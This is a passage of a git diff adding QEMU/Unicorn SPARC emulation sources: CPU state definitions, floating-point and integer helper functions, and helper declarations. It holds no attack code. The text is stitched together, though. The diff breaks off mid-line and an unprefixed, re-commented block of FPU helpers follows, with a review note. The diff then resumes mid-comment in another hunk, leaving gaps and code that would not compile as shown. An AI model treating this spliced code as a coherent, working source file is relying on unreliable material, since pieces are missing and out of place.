MAXTL_MAX 8 +#define MAXTL_MASK (MAXTL_MAX - 1) + trap_state ts[MAXTL_MAX]; + uint32_t xcc; /* Extended integer condition codes */ + uint32_t asi; + uint32_t pstate; + uint32_t tl; + uint32_t maxtl; + uint32_t cansave, canrestore, otherwin, wstate, cleanwin; + uint64_t agregs[8]; /* alternate general registers */ + uint64_t bgregs[8]; /* backup for normal global registers */ + uint64_t igregs[8]; /* interrupt general registers */ + uint64_t mgregs[8]; /* mmu general registers */ + uint64_t fprs; + uint64_t tick_cmpr, stick_cmpr; + CPUTimer *tick, *stick; +#define TICK_NPT_MASK 0x8000000000000000ULL +#define TICK_INT_DIS 0x8000000000000000ULL + uint64_t gsr; + uint32_t gl; // UA2005 + /* UA 2005 hyperprivileged registers */ + uint64_t hpstate, htstate[MAXTL_MAX], hintp, htba, hver, hstick_cmpr, ssr; + CPUTimer *hstick; // UA 2005 + /* Interrupt vector registers */ + uint64_t ivec_status; + uint64_t ivec_data[3]; + 
uint32_t softint; +#define SOFTINT_TIMER 1 +#define SOFTINT_STIMER (1 << 16) +#define SOFTINT_INTRMASK (0xFFFE) +#define SOFTINT_REG_MASK (SOFTINT_STIMER|SOFTINT_INTRMASK|SOFTINT_TIMER) +#endif + sparc_def_t *def; + + //void *irq_manager; + //void (*qemu_irq_ack)(CPUSPARCState *env, void *irq_manager, int intno); + + /* Leon3 cache control */ + uint32_t cache_control; + + // Unicorn engine + struct uc_struct *uc; +}; + +#include "cpu-qom.h" + +#ifndef NO_CPU_IO_DEFS +/* cpu_init.c */ +SPARCCPU *cpu_sparc_init(struct uc_struct *uc, const char *cpu_model); +void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu); +void sparc_cpu_list(FILE *f, fprintf_function cpu_fprintf); +/* mmu_helper.c */ +int sparc_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); +target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev); +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env); + +#if !defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) +int sparc_cpu_memory_rw_debug(CPUState *cpu, vaddr addr, + uint8_t *buf, int len, bool is_write); +#endif + + +/* translate.c */ +void gen_intermediate_code_init(CPUSPARCState *env); + +/* cpu-exec.c */ +int cpu_sparc_exec(struct uc_struct *uc, CPUSPARCState *s); + +/* win_helper.c */ +target_ulong cpu_get_psr(CPUSPARCState *env1); +void cpu_put_psr(CPUSPARCState *env1, target_ulong val); +#ifdef TARGET_SPARC64 +target_ulong cpu_get_ccr(CPUSPARCState *env1); +void cpu_put_ccr(CPUSPARCState *env1, target_ulong val); +target_ulong cpu_get_cwp64(CPUSPARCState *env1); +void cpu_put_cwp64(CPUSPARCState *env1, int cwp); +void cpu_change_pstate(CPUSPARCState *env1, uint32_t new_pstate); +#endif +int cpu_cwp_inc(CPUSPARCState *env1, int cwp); +int cpu_cwp_dec(CPUSPARCState *env1, int cwp); +void cpu_set_cwp(CPUSPARCState *env1, int new_cwp); + +/* int_helper.c */ +void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno); + +/* sun4m.c, sun4u.c */ +void 
/*
 * compare_masked:
 * Test @x and @y for equality restricted to the bit positions selected
 * by @mask.  Returns nonzero when the masked values match, else zero.
 */
static inline int compare_masked(uint64_t x, uint64_t y, uint64_t mask)
{
    const uint64_t masked_x = x & mask;
    const uint64_t masked_y = y & mask;

    return masked_x == masked_y;
}
/* Select the softmmu TLB index for the current privilege state. */
static inline int cpu_mmu_index(CPUSPARCState *env1)
{
#if defined(CONFIG_USER_ONLY)
    return MMU_USER_IDX;
#elif !defined(TARGET_SPARC64)
    /* sparc32: user (0) vs supervisor (1), straight from PSR.S. */
    return env1->psrs;
#else
    /* sparc64: any trap level > 0 runs in the nucleus context; otherwise
     * rank by hypervisor > supervisor > user privilege. */
    if (env1->tl > 0) {
        return MMU_NUCLEUS_IDX;
    } else if (cpu_hypervisor_mode(env1)) {
        return MMU_HYPV_IDX;
    } else if (cpu_supervisor_mode(env1)) {
        return MMU_KERNEL_IDX;
    } else {
        return MMU_USER_IDX;
    }
#endif
}

/* True when traps/interrupts are enabled: PSR.ET on sparc32,
 * PSTATE.IE on sparc64. */
static inline int cpu_interrupts_enabled(CPUSPARCState *env1)
{
#if !defined (TARGET_SPARC64)
    if (env1->psret != 0)
        return 1;
#else
    if (env1->pstate & PS_IE)
        return 1;
#endif

    return 0;
}

/* May an interrupt at priority @pil preempt?  It must exceed the current
 * processor interrupt level (psrpil). */
static inline int cpu_pil_allowed(CPUSPARCState *env1, int pil)
{
#if !defined(TARGET_SPARC64)
    /* level 15 is non-maskable on sparc v8 */
    return pil == 15 || pil > env1->psrpil;
#else
    return pil > env1->psrpil;
#endif
}
/* Did the translated block's flags have the FPU enabled?  User-mode
 * emulation always exposes the FPU. */
static inline bool tb_fpu_enabled(int tb_flags)
{
#if defined(CONFIG_USER_ONLY)
    return true;
#else
    return tb_flags & TB_FLAG_FPU_ENABLED;
#endif
}

/* Is the 32-bit address mask (PSTATE.AM) active for this block?
 * Only meaningful on sparc64; always false on sparc32. */
static inline bool tb_am_enabled(int tb_flags)
{
#ifndef TARGET_SPARC64
    return false;
#else
    return tb_flags & TB_FLAG_AM_ENABLED;
#endif
}
/*
 * Fold softfloat's accumulated IEEE exception flags into env->fsr.
 * Newly raised conditions land in the FSR "current exception" (CEXC)
 * bits; if any raised condition is unmasked in TEM, an fp_exception
 * trap is generated, otherwise the conditions accumulate into AEXC.
 *
 * NOTE(review): CEXC is not cleared here before new flags are OR'd in,
 * so bits left over from an earlier op persist into this check --
 * verify against upstream QEMU behaviour for this vintage.
 */
static void check_ieee_exceptions(CPUSPARCState *env)
{
    target_ulong status;

    status = get_float_exception_flags(&env->fp_status);
    if (status) {
        /* Copy IEEE 754 flags into FSR */
        if (status & float_flag_invalid) {
            env->fsr |= FSR_NVC;
        }
        if (status & float_flag_overflow) {
            env->fsr |= FSR_OFC;
        }
        if (status & float_flag_underflow) {
            env->fsr |= FSR_UFC;
        }
        if (status & float_flag_divbyzero) {
            env->fsr |= FSR_DZC;
        }
        if (status & float_flag_inexact) {
            env->fsr |= FSR_NXC;
        }

        /* TEM occupies FSR bits 23..27 and CEXC bits 0..4; shifting TEM
         * down by 23 lines the two masks up bit-for-bit. */
        if ((env->fsr & FSR_CEXC_MASK) & ((env->fsr & FSR_TEM_MASK) >> 23)) {
            /* Unmasked exception, generate a trap */
            env->fsr |= FSR_FTT_IEEE_EXCP;
            helper_raise_exception(env, TT_FP_EXCP);
        } else {
            /* Accumulate exceptions: AEXC sits 5 bits above CEXC. */
            env->fsr |= (env->fsr & FSR_CEXC_MASK) << 5;
        }
    }
}

/* Reset softfloat's sticky exception flags before the next FP op. */
static inline void clear_float_exceptions(CPUSPARCState *env)
{
    set_float_exception_flags(0, &env->fp_status);
}
/* fdmulq: double-precision multiply producing a quad result in QT0,
 * with both operands widened to float128 first. */
void helper_fdmulq(CPUSPARCState *env, float64 src1, float64 src2)
{
    clear_float_exceptions(env);
    QT0 = float128_mul(float64_to_float128(src1, &env->fp_status),
                       float64_to_float128(src2, &env->fp_status),
                       &env->fp_status);
    check_ieee_exceptions(env);
}

/* Sign flip only -- never signals, so no exception bookkeeping needed. */
float32 helper_fnegs(float32 src)
{
    return float32_chs(src);
}

#ifdef TARGET_SPARC64
float64 helper_fnegd(float64 src)
{
    return float64_chs(src);
}

/* Quad negate: reads QT1, writes QT0.  F_HELPER(neg, q) expands to
 * "void helper_fnegq(CPUSPARCState *env)" (macro defined above). */
F_HELPER(neg, q)
{
    QT0 = float128_chs(QT1);
}
#endif

/* Integer to float conversion. */
float32 helper_fitos(CPUSPARCState *env, int32_t src)
{
    /* Inexact error possible converting int to float. */
    float32 ret;
    clear_float_exceptions(env);
    ret = int32_to_float32(src, &env->fp_status);
    check_ieee_exceptions(env);
    return ret;
}

float64 helper_fitod(CPUSPARCState *env, int32_t src)
{
    /* No possible exceptions converting int to double. */
    return int32_to_float64(src, &env->fp_status);
}

void helper_fitoq(CPUSPARCState *env, int32_t src)
{
    /* No possible exceptions converting int to long double. */
    QT0 = int32_to_float128(src, &env->fp_status);
}
*/ + QT0 = int64_to_float128(src, &env->fp_status); +} +#endif +#undef F_HELPER + +/* floating point conversion */ +float32 helper_fdtos(CPUSPARCState *env, float64 src) +{ + float32 ret; + clear_float_exceptions(env); + ret = float64_to_float32(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fstod(CPUSPARCState *env, float32 src) +{ + float64 ret; + clear_float_exceptions(env); + ret = float32_to_float64(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float32 helper_fqtos(CPUSPARCState *env) +{ + float32 ret; + clear_float_exceptions(env); + ret = float128_to_float32(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fstoq(CPUSPARCState *env, float32 src) +{ + clear_float_exceptions(env); + QT0 = float32_to_float128(src, &env->fp_status); + check_ieee_exceptions(env); +} + +float64 helper_fqtod(CPUSPARCState *env) +{ + float64 ret; + clear_float_exceptions(env); + ret = float128_to_float64(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fdtoq(CPUSPARCState *env, float64 src) +{ + clear_float_exceptions(env); + QT0 = float64_to_float128(src, &env->fp_status); + check_ieee_exceptions(env); +} + +/* Float to integer conversion. 
*/ +int32_t helper_fstoi(CPUSPARCState *env, float32 src) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float32_to_int32_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int32_t helper_fdtoi(CPUSPARCState *env, float64 src) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float64_to_int32_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int32_t helper_fqtoi(CPUSPARCState *env) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float128_to_int32_round_to_zero(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +#ifdef TARGET_SPARC64 +int64_t helper_fstox(CPUSPARCState *env, float32 src) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float32_to_int64_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int64_t helper_fdtox(CPUSPARCState *env, float64 src) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float64_to_int64_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int64_t helper_fqtox(CPUSPARCState *env) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float128_to_int64_round_to_zero(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} +#endif + +float32 helper_fabss(float32 src) +{ + return float32_abs(src); +} + +#ifdef TARGET_SPARC64 +float64 helper_fabsd(float64 src) +{ + return float64_abs(src); +} + +void helper_fabsq(CPUSPARCState *env) +{ + QT0 = float128_abs(QT1); +} +#endif + +float32 helper_fsqrts(CPUSPARCState *env, float32 src) +{ + float32 ret; + clear_float_exceptions(env); + ret = float32_sqrt(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fsqrtd(CPUSPARCState *env, float64 src) +{ + float64 ret; + clear_float_exceptions(env); + ret = float64_sqrt(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fsqrtq(CPUSPARCState *env) +{ + 
clear_float_exceptions(env); + QT0 = float128_sqrt(QT1, &env->fp_status); + check_ieee_exceptions(env); +} + +#define GEN_FCMP(name, size, reg1, reg2, FS, E) \ + void glue(helper_, name) (CPUSPARCState *env) \ + { \ + int ret; \ + clear_float_exceptions(env); \ + if (E) { \ + ret = glue(size, _compare)(reg1, reg2, &env->fp_status); \ + } else { \ + ret = glue(size, _compare_quiet)(reg1, reg2, \ + &env->fp_status); \ + } \ + check_ieee_exceptions(env); \ + switch (ret) { \ + case float_relation_unordered: \ + env->fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ + env->fsr |= FSR_NVA; \ + break; \ + case float_relation_less: \ + env->fsr &= ~(FSR_FCC1) << FS; \ + env->fsr |= FSR_FCC0 << FS; \ + break; \ + case float_relation_greater: \ + env->fsr &= ~(FSR_FCC0) << FS; \ + env->fsr |= FSR_FCC1 << FS; \ + break; \ + default: \ + env->fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ + break; \ + } \ + } +#define GEN_FCMP_T(name, size, FS, E) \ + void glue(helper_, name)(CPUSPARCState *env, size src1, size src2) \ + { \ + int ret; \ + clear_float_exceptions(env); \ + if (E) { \ + ret = glue(size, _compare)(src1, src2, &env->fp_status); \ + } else { \ + ret = glue(size, _compare_quiet)(src1, src2, \ + &env->fp_status); \ + } \ + check_ieee_exceptions(env); \ + switch (ret) { \ + case float_relation_unordered: \ + env->fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ + break; \ + case float_relation_less: \ + env->fsr &= ~(FSR_FCC1 << FS); \ + env->fsr |= FSR_FCC0 << FS; \ + break; \ + case float_relation_greater: \ + env->fsr &= ~(FSR_FCC0 << FS); \ + env->fsr |= FSR_FCC1 << FS; \ + break; \ + default: \ + env->fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ + break; \ + } \ + } + +GEN_FCMP_T(fcmps, float32, 0, 0); +GEN_FCMP_T(fcmpd, float64, 0, 0); + +GEN_FCMP_T(fcmpes, float32, 0, 1); +GEN_FCMP_T(fcmped, float64, 0, 1); + +GEN_FCMP(fcmpq, float128, QT0, QT1, 0, 0); +GEN_FCMP(fcmpeq, float128, QT0, QT1, 0, 1); + +#ifdef TARGET_SPARC64 +GEN_FCMP_T(fcmps_fcc1, float32, 22, 0); +GEN_FCMP_T(fcmpd_fcc1, 
float64, 22, 0); +GEN_FCMP(fcmpq_fcc1, float128, QT0, QT1, 22, 0); + +GEN_FCMP_T(fcmps_fcc2, float32, 24, 0); +GEN_FCMP_T(fcmpd_fcc2, float64, 24, 0); +GEN_FCMP(fcmpq_fcc2, float128, QT0, QT1, 24, 0); + +GEN_FCMP_T(fcmps_fcc3, float32, 26, 0); +GEN_FCMP_T(fcmpd_fcc3, float64, 26, 0); +GEN_FCMP(fcmpq_fcc3, float128, QT0, QT1, 26, 0); + +GEN_FCMP_T(fcmpes_fcc1, float32, 22, 1); +GEN_FCMP_T(fcmped_fcc1, float64, 22, 1); +GEN_FCMP(fcmpeq_fcc1, float128, QT0, QT1, 22, 1); + +GEN_FCMP_T(fcmpes_fcc2, float32, 24, 1); +GEN_FCMP_T(fcmped_fcc2, float64, 24, 1); +GEN_FCMP(fcmpeq_fcc2, float128, QT0, QT1, 24, 1); + +GEN_FCMP_T(fcmpes_fcc3, float32, 26, 1); +GEN_FCMP_T(fcmped_fcc3, float64, 26, 1); +GEN_FCMP(fcmpeq_fcc3, float128, QT0, QT1, 26, 1); +#endif +#undef GEN_FCMP_T +#undef GEN_FCMP + +static inline void set_fsr(CPUSPARCState *env) +{ + int rnd_mode; + + switch (env->fsr & FSR_RD_MASK) { + case FSR_RD_NEAREST: + rnd_mode = float_round_nearest_even; + break; + default: + case FSR_RD_ZERO: + rnd_mode = float_round_to_zero; + break; + case FSR_RD_POS: + rnd_mode = float_round_up; + break; + case FSR_RD_NEG: + rnd_mode = float_round_down; + break; + } + set_float_rounding_mode(rnd_mode, &env->fp_status); +} + +void helper_ldfsr(CPUSPARCState *env, uint32_t new_fsr) +{ + env->fsr = (new_fsr & FSR_LDFSR_MASK) | (env->fsr & FSR_LDFSR_OLDMASK); + set_fsr(env); +} + +#ifdef TARGET_SPARC64 +void helper_ldxfsr(CPUSPARCState *env, uint64_t new_fsr) +{ + env->fsr = (new_fsr & FSR_LDXFSR_MASK) | (env->fsr & FSR_LDXFSR_OLDMASK); + set_fsr(env); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c new file mode 100644 index 0000000..602a819 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c @@ -0,0 +1,255 @@ +/* + * Misc Sparc helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it 
and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" +#include "sysemu/sysemu.h" + +void helper_raise_exception(CPUSPARCState *env, int tt) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +void helper_debug(CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->exception_index = EXCP_DEBUG; + cpu_loop_exit(cs); +} + +#ifdef TARGET_SPARC64 +target_ulong helper_popc(target_ulong val) +{ + return ctpop64(val); +} + +void helper_tick_set_count(void *opaque, uint64_t count) +{ +#if !defined(CONFIG_USER_ONLY) + // cpu_tick_set_count(opaque, count); +#endif +} + +uint64_t helper_tick_get_count(void *opaque) +{ +#if !defined(CONFIG_USER_ONLY) + return 0; //cpu_tick_get_count(opaque); +#else + return 0; +#endif +} + +void helper_tick_set_limit(void *opaque, uint64_t limit) +{ +#if !defined(CONFIG_USER_ONLY) + // cpu_tick_set_limit(opaque, limit); +#endif +} +#endif + +static target_ulong helper_udiv_common(CPUSPARCState *env, target_ulong a, + target_ulong b, int cc) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + int overflow = 0; + uint64_t x0; + uint32_t x1; + + x0 = (a & 0xffffffff) | ((uint64_t) (env->y) << 32); + x1 = (b & 0xffffffff); + + if (x1 == 0) { + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } + + x0 = x0 / x1; + if (x0 > UINT32_MAX) 
{ + x0 = UINT32_MAX; + overflow = 1; + } + + if (cc) { + env->cc_dst = x0; + env->cc_src2 = overflow; + env->cc_op = CC_OP_DIV; + } + return x0; +} + +target_ulong helper_udiv(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_udiv_common(env, a, b, 0); +} + +target_ulong helper_udiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_udiv_common(env, a, b, 1); +} + +static target_ulong helper_sdiv_common(CPUSPARCState *env, target_ulong a, + target_ulong b, int cc) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + int overflow = 0; + int64_t x0; + int32_t x1; + + x0 = (a & 0xffffffff) | ((uint64_t) (env->y) << 32); + x1 = (b & 0xffffffff); + + if (x1 == 0) { + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } else if (x1 == -1 && x0 == INT64_MIN) { + x0 = INT32_MAX; + overflow = 1; + } else { + x0 = x0 / x1; + if ((int32_t) x0 != x0) { + x0 = x0 < 0 ? INT32_MIN : INT32_MAX; + overflow = 1; + } + } + + if (cc) { + env->cc_dst = x0; + env->cc_src2 = overflow; + env->cc_op = CC_OP_DIV; + } + return x0; +} + +target_ulong helper_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_sdiv_common(env, a, b, 0); +} + +target_ulong helper_sdiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_sdiv_common(env, a, b, 1); +} + +#ifdef TARGET_SPARC64 +int64_t helper_sdivx(CPUSPARCState *env, int64_t a, int64_t b) +{ + if (b == 0) { + /* Raise divide by zero trap. */ + SPARCCPU *cpu = sparc_env_get_cpu(env); + + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } else if (b == -1) { + /* Avoid overflow trap with i386 divide insn. */ + return -a; + } else { + return a / b; + } +} + +uint64_t helper_udivx(CPUSPARCState *env, uint64_t a, uint64_t b) +{ + if (b == 0) { + /* Raise divide by zero trap. 
*/ + SPARCCPU *cpu = sparc_env_get_cpu(env); + + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } + return a / b; +} +#endif + +target_ulong helper_taddcctv(CPUSPARCState *env, target_ulong src1, + target_ulong src2) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + target_ulong dst; + + /* Tag overflow occurs if either input has bits 0 or 1 set. */ + if ((src1 | src2) & 3) { + goto tag_overflow; + } + + dst = src1 + src2; + + /* Tag overflow occurs if the addition overflows. */ + if (~(src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { + goto tag_overflow; + } + + /* Only modify the CC after any exceptions have been generated. */ + env->cc_op = CC_OP_TADDTV; + env->cc_src = src1; + env->cc_src2 = src2; + env->cc_dst = dst; + return dst; + + tag_overflow: + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_TOVF); +} + +target_ulong helper_tsubcctv(CPUSPARCState *env, target_ulong src1, + target_ulong src2) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + target_ulong dst; + + /* Tag overflow occurs if either input has bits 0 or 1 set. */ + if ((src1 | src2) & 3) { + goto tag_overflow; + } + + dst = src1 - src2; + + /* Tag overflow occurs if the subtraction overflows. */ + if ((src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { + goto tag_overflow; + } + + /* Only modify the CC after any exceptions have been generated. 
*/ + env->cc_op = CC_OP_TSUBTV; + env->cc_src = src1; + env->cc_src2 = src2; + env->cc_dst = dst; + return dst; + + tag_overflow: + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_TOVF); +} + +//#ifndef TARGET_SPARC64 +void helper_power_down(CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->halted = 1; + cs->exception_index = EXCP_HLT; + env->pc = env->npc; + env->npc = env->pc + 4; + cpu_loop_exit(cs); +} +//#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h new file mode 100644 index 0000000..503e1e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h @@ -0,0 +1,177 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) +DEF_HELPER_1(power_down, void, env) + +#ifndef TARGET_SPARC64 +DEF_HELPER_1(rett, void, env) +DEF_HELPER_2(wrpsr, void, env, tl) +DEF_HELPER_1(rdpsr, tl, env) +#else +DEF_HELPER_2(wrpil, void, env, tl) +DEF_HELPER_2(wrpstate, void, env, tl) +DEF_HELPER_1(done, void, env) +DEF_HELPER_1(retry, void, env) +DEF_HELPER_1(flushw, void, env) +DEF_HELPER_1(saved, void, env) +DEF_HELPER_1(restored, void, env) +DEF_HELPER_1(rdccr, tl, env) +DEF_HELPER_2(wrccr, void, env, tl) +DEF_HELPER_1(rdcwp, tl, env) +DEF_HELPER_2(wrcwp, void, env, tl) +DEF_HELPER_FLAGS_2(array8, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_1(popc, tl, tl) +DEF_HELPER_4(ldda_asi, void, env, tl, int, int) +DEF_HELPER_5(ldf_asi, void, env, tl, int, int, int) +DEF_HELPER_5(stf_asi, void, env, tl, int, int, int) +DEF_HELPER_5(casx_asi, tl, env, tl, tl, tl, i32) +DEF_HELPER_2(set_softint, void, env, i64) +DEF_HELPER_2(clear_softint, void, env, i64) +DEF_HELPER_2(write_softint, void, env, i64) +DEF_HELPER_2(tick_set_count, void, ptr, i64) +DEF_HELPER_1(tick_get_count, i64, ptr) +DEF_HELPER_2(tick_set_limit, void, ptr, i64) +#endif +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) 
+DEF_HELPER_5(cas_asi, tl, env, tl, tl, tl, i32) +#endif +DEF_HELPER_3(check_align, void, env, tl, i32) +DEF_HELPER_1(debug, void, env) +DEF_HELPER_1(save, void, env) +DEF_HELPER_1(restore, void, env) +DEF_HELPER_3(udiv, tl, env, tl, tl) +DEF_HELPER_3(udiv_cc, tl, env, tl, tl) +DEF_HELPER_3(sdiv, tl, env, tl, tl) +DEF_HELPER_3(sdiv_cc, tl, env, tl, tl) +DEF_HELPER_3(taddcctv, tl, env, tl, tl) +DEF_HELPER_3(tsubcctv, tl, env, tl, tl) +#ifdef TARGET_SPARC64 +DEF_HELPER_3(sdivx, s64, env, s64, s64) +DEF_HELPER_3(udivx, i64, env, i64, i64) +#endif +DEF_HELPER_3(ldqf, void, env, tl, int) +DEF_HELPER_3(stqf, void, env, tl, int) +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +DEF_HELPER_5(ld_asi, i64, env, tl, int, int, int) +DEF_HELPER_5(st_asi, void, env, tl, i64, int, int) +#endif +DEF_HELPER_2(ldfsr, void, env, i32) +DEF_HELPER_FLAGS_1(fabss, TCG_CALL_NO_RWG_SE, f32, f32) +DEF_HELPER_2(fsqrts, f32, env, f32) +DEF_HELPER_2(fsqrtd, f64, env, f64) +DEF_HELPER_3(fcmps, void, env, f32, f32) +DEF_HELPER_3(fcmpd, void, env, f64, f64) +DEF_HELPER_3(fcmpes, void, env, f32, f32) +DEF_HELPER_3(fcmped, void, env, f64, f64) +DEF_HELPER_1(fsqrtq, void, env) +DEF_HELPER_1(fcmpq, void, env) +DEF_HELPER_1(fcmpeq, void, env) +#ifdef TARGET_SPARC64 +DEF_HELPER_2(ldxfsr, void, env, i64) +DEF_HELPER_FLAGS_1(fabsd, TCG_CALL_NO_RWG_SE, f64, f64) +DEF_HELPER_3(fcmps_fcc1, void, env, f32, f32) +DEF_HELPER_3(fcmps_fcc2, void, env, f32, f32) +DEF_HELPER_3(fcmps_fcc3, void, env, f32, f32) +DEF_HELPER_3(fcmpd_fcc1, void, env, f64, f64) +DEF_HELPER_3(fcmpd_fcc2, void, env, f64, f64) +DEF_HELPER_3(fcmpd_fcc3, void, env, f64, f64) +DEF_HELPER_3(fcmpes_fcc1, void, env, f32, f32) +DEF_HELPER_3(fcmpes_fcc2, void, env, f32, f32) +DEF_HELPER_3(fcmpes_fcc3, void, env, f32, f32) +DEF_HELPER_3(fcmped_fcc1, void, env, f64, f64) +DEF_HELPER_3(fcmped_fcc2, void, env, f64, f64) +DEF_HELPER_3(fcmped_fcc3, void, env, f64, f64) +DEF_HELPER_1(fabsq, void, env) +DEF_HELPER_1(fcmpq_fcc1, void, env) 
+DEF_HELPER_1(fcmpq_fcc2, void, env) +DEF_HELPER_1(fcmpq_fcc3, void, env) +DEF_HELPER_1(fcmpeq_fcc1, void, env) +DEF_HELPER_1(fcmpeq_fcc2, void, env) +DEF_HELPER_1(fcmpeq_fcc3, void, env) +#endif +DEF_HELPER_2(raise_exception, noreturn, env, int) +#define F_HELPER_0_1(name) DEF_HELPER_1(f ## name, void, env) + +DEF_HELPER_3(faddd, f64, env, f64, f64) +DEF_HELPER_3(fsubd, f64, env, f64, f64) +DEF_HELPER_3(fmuld, f64, env, f64, f64) +DEF_HELPER_3(fdivd, f64, env, f64, f64) +F_HELPER_0_1(addq) +F_HELPER_0_1(subq) +F_HELPER_0_1(mulq) +F_HELPER_0_1(divq) + +DEF_HELPER_3(fadds, f32, env, f32, f32) +DEF_HELPER_3(fsubs, f32, env, f32, f32) +DEF_HELPER_3(fmuls, f32, env, f32, f32) +DEF_HELPER_3(fdivs, f32, env, f32, f32) + +DEF_HELPER_3(fsmuld, f64, env, f32, f32) +DEF_HELPER_3(fdmulq, void, env, f64, f64) + +DEF_HELPER_FLAGS_1(fnegs, TCG_CALL_NO_RWG_SE, f32, f32) +DEF_HELPER_2(fitod, f64, env, s32) +DEF_HELPER_2(fitoq, void, env, s32) + +DEF_HELPER_2(fitos, f32, env, s32) + +#ifdef TARGET_SPARC64 +DEF_HELPER_FLAGS_1(fnegd, TCG_CALL_NO_RWG_SE, f64, f64) +DEF_HELPER_1(fnegq, void, env) +DEF_HELPER_2(fxtos, f32, env, s64) +DEF_HELPER_2(fxtod, f64, env, s64) +DEF_HELPER_2(fxtoq, void, env, s64) +#endif +DEF_HELPER_2(fdtos, f32, env, f64) +DEF_HELPER_2(fstod, f64, env, f32) +DEF_HELPER_1(fqtos, f32, env) +DEF_HELPER_2(fstoq, void, env, f32) +DEF_HELPER_1(fqtod, f64, env) +DEF_HELPER_2(fdtoq, void, env, f64) +DEF_HELPER_2(fstoi, s32, env, f32) +DEF_HELPER_2(fdtoi, s32, env, f64) +DEF_HELPER_1(fqtoi, s32, env) +#ifdef TARGET_SPARC64 +DEF_HELPER_2(fstox, s64, env, f32) +DEF_HELPER_2(fdtox, s64, env, f64) +DEF_HELPER_1(fqtox, s64, env) + +DEF_HELPER_FLAGS_2(fpmerge, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16al, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16au, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) 
